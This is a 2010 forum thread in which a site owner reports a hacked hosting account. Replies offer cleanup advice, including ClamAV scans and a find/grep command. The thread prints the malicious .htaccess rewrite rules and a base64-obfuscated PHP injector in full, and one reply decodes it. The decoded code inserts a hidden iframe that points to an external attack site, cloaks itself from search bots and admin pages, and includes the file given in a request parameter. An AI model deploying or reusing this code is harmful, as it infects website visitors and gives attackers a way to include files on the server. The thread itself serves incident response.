My Hosting Account Was Hacked With HTML:Iframe-inf

Discussion in 'Security' started by Macavi, Jan 6, 2010.

0
  1. #1
    :mad: I have noticed that when i try to access my websites, it redirects me to strange file called PExxxxxxxx.php. And this happens with all of my domains. I have noticed also that all of my htaccess files have been changed with the following:

    #65FDA983BAA2{
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !PE(.*).php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml)	PE65FDA983BAA2.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
#65FDA983BAA2}
    Code (markup):
    PExxxxxx.php files have this encrypted code in them:

    <?php

eval(base64_decode('JElJSUlJSUlJSUlJSSA9ICc8ZGl2IHN0eWxlPSJkaXNwbGF5Om5vbmUiPiZuYnNwOyAmbmJzcDs8aWZyYW1lIGZzZHNkZj0ic2RmZGYiIHdpZHRoPSI3MzIiIGhlaWdodD0iNDA1MSIgc3JjPSJodHRwOi8vZ3JpenpsaS1jb3VudGVyLmNvbS9pZDEyMC9pbmRleC5waHAiPjwvaWZyYW1lPjwvZGl2Pic7IGZ1bmN0aW9uIElJSUlJSUlJSUlJSSgkSUlJSUlJSUlJSUlsKSB7IGdsb2JhbCAkYXJndjsgJElJSUlJSUlJSUlsSSA9IGRpcm5hbWUoZ2V0Y3dkKCkgLiAnLycgLiAkSUlJSUlJSUlJSUlsKTsgJElJSUlJSUlJSUlsbCA9IGdldGN3ZCgpOyBAY2hkaXIoJElJSUlJSUlJSUlsSSk7ICRJSUlJSUlJSUlJbEkgPSBnZXRjd2QoKTsgQGNoZGlyKCRJSUlJSUlJSUlJbGwpOyByZXR1cm4gJElJSUlJSUlJSUlsSTsgfSBmdW5jdGlvbiBJSUlJSUlJSUlJSWwoJElJSUlJSUlJSUlsMSkgeyBpZiggc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJZYW5kZXgvIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIllhRGlyZWN0Qm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIkphbWVzIEJvbmQiKSAhPSBudWxsIHx8IHN0cnN0cigkSUlJSUlJSUlJSWwxLCAiR29vZ2xlYm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIk1lZGlhcGFydG5lcnMtR29vZ2xlIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIlN0YWNrUmFtYmxlciIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJTbHVycCIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJtc25ib3QiKSAhPSBudWxsICkgeyByZXR1cm4gdHJ1ZTsgfSByZXR1cm4gZmFsc2U7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSUkxKCRJSUlJSUlJSUlJbEkpIHsgJElJSUlJSUlJSUkxSSA9IGFycmF5KCdhZG0nLCAncG1hJywgJ21vZGVyJywgJ2NwJyk7ICRJSUlJSUlJSUlJMWwgPSBmYWxzZTsgZm9yZWFjaCAoJElJSUlJSUlJSUkxSSBhcyAkSUlJSUlJSUlJSTExKSB7IGlmKHN0cnN0cigkSUlJSUlJSUlJSWxJLCAkSUlJSUlJSUlJSTExKSAhPSBudWxsKSB7ICRJSUlJSUlJSUlJMWwgPSB0cnVlOyB9IH0gcmV0dXJuICRJSUlJSUlJSUlJMWw7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSWxJKCRJSUlJSUlJSUlsSUkpIHsgZ2xvYmFsICRJSUlJSUlJSUlJSUksICRfU0VSVkVSOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPGlmcmFtZS4qc3R5bGU9LipoaWRkZW4uKlwvaWZyYW1lW14+XSo+L2knLCAiIiwgJElJSUlJSUlJSWxJSSk7ICRJSUlJSUlJSUlsSUkgPSBwcmVnX3JlcGxhY2UoJy88ZGl2LipzdHlsZT0uKmRpc3BsYXk6bm9uZS4qW14+XSo+Lio8aWZyYW1lIC4qXC8uKmRpdltePl0qPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPCEtLSBhZCAtLT48c2NyaXB0W14+XSo+Lio8XC9zY3JpcHQ+PCEtLSBcL2FkIC0tPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyBpZihJSUlJSUlJSUlJSWwoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSA9PSB0cnVlIHx8IElJSUlJSUlJSUlJMShkaXJuYW1lKCRfU0VSVkVSWydTQ1JJUFRfTkFNRSddKSkgPT0gdHJ1ZSkgeyByZXR1cm4gJElJSUlJSUlJSWxJSTsgfSBlbHNlIHsgaWYocHJlZ19tYXRjaCgiLyg8Ym9keVtePl0qPikvaSIsICRJSUlJSUlJSUlsSUkpID4gMCkgeyByZXR1cm4gcHJlZ19yZXBsYWNlKCIvKDxib2R5W14+XSo+KS9pIiwgIiRJSUlJSUlJSUlsSTEgXG4iLiRJSUlJSUlJSUlJSUksICRJSUlJSUlJSUlsSUksIDEpOyB9IGVsc2UgeyByZXR1cm4gJElJSUlJSUlJSWxJSS4kSUlJSUlJSUlJSUlJOyB9IH0gfSBpZihAb2Jfc3RhcnQoJ0lJSUlJSUlJSUlsSScpID09IHRydWUpIHsgJElJSUlJSUlJSUlJbCA9ICRfR0VUWydxcSddOyBAY2hkaXIoSUlJSUlJSUlJSUlJKCRJSUlJSUlJSUlJSWwpKTsgaW5jbHVkZSgkSUlJSUlJSUlJSUlsKTsgfSBlbHNlIHsgZWNobyAkSUlJSUlJSUlJSUlJOyB9'));

?>
    Code (markup):
    What should i do? How to clean my account from virus?

    Thanks.
     
    Macavi, Jan 6, 2010 IP
  2. iRock-Matt

    iRock-Matt Peon

    Messages:
    39
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #2
    If that your server runs with Linxu and using cPanel/WHM you can use and install ClamAV which is free. This will somehow resolve the issue.
     
    iRock-Matt, Jan 6, 2010 IP
  3. baonhi41

    baonhi41 Peon

    Messages:
    141
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3 
    <?php

eval(base64_decode('JElJSUlJSUlJSUlJSSA9ICc8ZGl2IHN0eWxlPSJkaXNwbGF5Om5vbmUiPiZuYnNwOyAmbmJzcDs8aWZyYW1lIGZzZHNkZj0ic2RmZGYiIHdpZHRoPSI3MzIiIGhlaWdodD0iNDA1MSIgc3JjPSJodHRwOi8vZ3JpenpsaS1jb3VudGVyLmNvbS9pZDEyMC9pbmRleC5waHAiPjwvaWZyYW1lPjwvZGl2Pic7IGZ1bmN0aW9uIElJSUlJSUlJSUlJSSgkSUlJSUlJSUlJSUlsKSB7IGdsb2JhbCAkYXJndjsgJElJSUlJSUlJSUlsSSA9IGRpcm5hbWUoZ2V0Y3dkKCkgLiAnLycgLiAkSUlJSUlJSUlJSUlsKTsgJElJSUlJSUlJSUlsbCA9IGdldGN3ZCgpOyBAY2hkaXIoJElJSUlJSUlJSUlsSSk7ICRJSUlJSUlJSUlJbEkgPSBnZXRjd2QoKTsgQGNoZGlyKCRJSUlJSUlJSUlJbGwpOyByZXR1cm4gJElJSUlJSUlJSUlsSTsgfSBmdW5jdGlvbiBJSUlJSUlJSUlJSWwoJElJSUlJSUlJSUlsMSkgeyBpZiggc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJZYW5kZXgvIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIllhRGlyZWN0Qm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIkphbWVzIEJvbmQiKSAhPSBudWxsIHx8IHN0cnN0cigkSUlJSUlJSUlJSWwxLCAiR29vZ2xlYm90IikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIk1lZGlhcGFydG5lcnMtR29vZ2xlIikgIT0gbnVsbCB8fCBzdHJzdHIoJElJSUlJSUlJSUlsMSwgIlN0YWNrUmFtYmxlciIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJTbHVycCIpICE9IG51bGwgfHwgc3Ryc3RyKCRJSUlJSUlJSUlJbDEsICJtc25ib3QiKSAhPSBudWxsICkgeyByZXR1cm4gdHJ1ZTsgfSByZXR1cm4gZmFsc2U7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSUkxKCRJSUlJSUlJSUlJbEkpIHsgJElJSUlJSUlJSUkxSSA9IGFycmF5KCdhZG0nLCAncG1hJywgJ21vZGVyJywgJ2NwJyk7ICRJSUlJSUlJSUlJMWwgPSBmYWxzZTsgZm9yZWFjaCAoJElJSUlJSUlJSUkxSSBhcyAkSUlJSUlJSUlJSTExKSB7IGlmKHN0cnN0cigkSUlJSUlJSUlJSWxJLCAkSUlJSUlJSUlJSTExKSAhPSBudWxsKSB7ICRJSUlJSUlJSUlJMWwgPSB0cnVlOyB9IH0gcmV0dXJuICRJSUlJSUlJSUlJMWw7IH0gZnVuY3Rpb24gSUlJSUlJSUlJSWxJKCRJSUlJSUlJSUlsSUkpIHsgZ2xvYmFsICRJSUlJSUlJSUlJSUksICRfU0VSVkVSOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPGlmcmFtZS4qc3R5bGU9LipoaWRkZW4uKlwvaWZyYW1lW14+XSo+L2knLCAiIiwgJElJSUlJSUlJSWxJSSk7ICRJSUlJSUlJSUlsSUkgPSBwcmVnX3JlcGxhY2UoJy88ZGl2LipzdHlsZT0uKmRpc3BsYXk6bm9uZS4qW14+XSo+Lio8aWZyYW1lIC4qXC8uKmRpdltePl0qPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyAkSUlJSUlJSUlJbElJID0gcHJlZ19yZXBsYWNlKCcvPCEtLSBhZCAtLT48c2NyaXB0W14+XSo+Lio8XC9zY3JpcHQ+PCEtLSBcL2FkIC0tPi9pJywgIiIsICRJSUlJSUlJSUlsSUkpOyBpZihJSUlJSUlJSUlJSWwoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSA9PSB0cnVlIHx8IElJSUlJSUlJSUlJMShkaXJuYW1lKCRfU0VSVkVSWydTQ1JJUFRfTkFNRSddKSkgPT0gdHJ1ZSkgeyByZXR1cm4gJElJSUlJSUlJSWxJSTsgfSBlbHNlIHsgaWYocHJlZ19tYXRjaCgiLyg8Ym9keVtePl0qPikvaSIsICRJSUlJSUlJSUlsSUkpID4gMCkgeyByZXR1cm4gcHJlZ19yZXBsYWNlKCIvKDxib2R5W14+XSo+KS9pIiwgIiRJSUlJSUlJSUlsSTEgXG4iLiRJSUlJSUlJSUlJSUksICRJSUlJSUlJSUlsSUksIDEpOyB9IGVsc2UgeyByZXR1cm4gJElJSUlJSUlJSWxJSS4kSUlJSUlJSUlJSUlJOyB9IH0gfSBpZihAb2Jfc3RhcnQoJ0lJSUlJSUlJSUlsSScpID09IHRydWUpIHsgJElJSUlJSUlJSUlJbCA9ICRfR0VUWydxcSddOyBAY2hkaXIoSUlJSUlJSUlJSUlJKCRJSUlJSUlJSUlJSWwpKTsgaW5jbHVkZSgkSUlJSUlJSUlJSUlsKTsgfSBlbHNlIHsgZWNobyAkSUlJSUlJSUlJSUlJOyB9'));

?>
    PHP:
    DECODE:

    <?php

$IIIIIIIIIIII = '<div style="display:none">   <iframe fsdsdf="sdfdf" width="732" height="4051" src="http://grizzli-counter.com/id120/index.php"></iframe></div>'; function IIIIIIIIIIII($IIIIIIIIIIIl) { global $argv; $IIIIIIIIIIlI = dirname(getcwd() . '/' . $IIIIIIIIIIIl); $IIIIIIIIIIll = getcwd(); @chdir($IIIIIIIIIIlI); $IIIIIIIIIIlI = getcwd(); @chdir($IIIIIIIIIIll); return $IIIIIIIIIIlI; } function IIIIIIIIIIIl($IIIIIIIIIIl1) { if( strstr($IIIIIIIIIIl1, "Yandex/") != null || strstr($IIIIIIIIIIl1, "YaDirectBot") != null || strstr($IIIIIIIIIIl1, "James Bond") != null || strstr($IIIIIIIIIIl1, "Googlebot") != null || strstr($IIIIIIIIIIl1, "Mediapartners-Google") != null || strstr($IIIIIIIIIIl1, "StackRambler") != null || strstr($IIIIIIIIIIl1, "Slurp") != null || strstr($IIIIIIIIIIl1, "msnbot") != null ) { return true; } return false; } function IIIIIIIIIII1($IIIIIIIIIIlI) { $IIIIIIIIII1I = array('adm', 'pma', 'moder', 'cp'); $IIIIIIIIII1l = false; foreach ($IIIIIIIIII1I as $IIIIIIIIII11) { if(strstr($IIIIIIIIIIlI, $IIIIIIIIII11) != null) { $IIIIIIIIII1l = true; } } return $IIIIIIIIII1l; } function IIIIIIIIIIlI($IIIIIIIIIlII) { global $IIIIIIIIIIII, $_SERVER; $IIIIIIIIIlII = preg_replace('/<iframe.*style=.*hidden.*\/iframe[^>]*>/i', "", $IIIIIIIIIlII); $IIIIIIIIIlII = preg_replace('/<div.*style=.*display:none.*[^>]*>.*<iframe .*\/.*div[^>]*>/i', "", $IIIIIIIIIlII); $IIIIIIIIIlII = preg_replace('/<!-- ad --><script[^>]*>.*<\/script><!-- \/ad -->/i', "", $IIIIIIIIIlII); if(IIIIIIIIIIIl($_SERVER['HTTP_USER_AGENT']) == true || IIIIIIIIIII1(dirname($_SERVER['SCRIPT_NAME'])) == true) { return $IIIIIIIIIlII; } else { if(preg_match("/(<body[^>]*>)/i", $IIIIIIIIIlII) > 0) { return preg_replace("/(<body[^>]*>)/i", "$IIIIIIIIIlI1 \n".$IIIIIIIIIIII, $IIIIIIIIIlII, 1); } else { return $IIIIIIIIIlII.$IIIIIIIIIIII; } } } if(@ob_start('IIIIIIIIIIlI') == true) { $IIIIIIIIIIIl = $_GET['qq']; @chdir(IIIIIIIIIIII($IIIIIIIIIIIl)); include($IIIIIIIIIIIl); } else { echo $IIIIIIIIIIII; }

?>
    PHP:
    They add iframe http://grizzli-counter.com/id120/index.php --> Attack site

    I think they use local attack or your server rooted and infected
     
    baonhi41, Jan 6, 2010 IP
  4. ATTRACTI

    ATTRACTI Peon

    Messages:
    21
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #4
    run clamav on all html/php files. it can find all infected files. then just mass replace that strings with blank.
     
    ATTRACTI, Jan 8, 2010 IP
  5. Bohra

    Bohra Prominent Member

    Messages:
    12,573
    Likes Received:
    537
    Best Answers:
    0
    Trophy Points:
    310
    #5
    Remove your .htaccess and remove all the codes which were added and then change ur host
     
    Bohra, Jan 8, 2010 IP
  6. edenCC

    edenCC Member

    Messages:
    63
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    41
    #6
    also, you can follow this way...
    1, find all newly modified files and grep JElJSUl in there
    
find /web/dir -type f -mtime -3 -exec grep -c JElJSUl {} \;
#This command will search files modified in 3 days with the strings "JElJSUl"
    Code (markup):
    2, then, edit the files with 1 suffixed (like 'index.php:1") one by one, so that you can get rid of such attack completly

    The installation of ClamAV is highly recommended as it helps you find iframe html code as well.
     
    edenCC, Jan 10, 2010 IP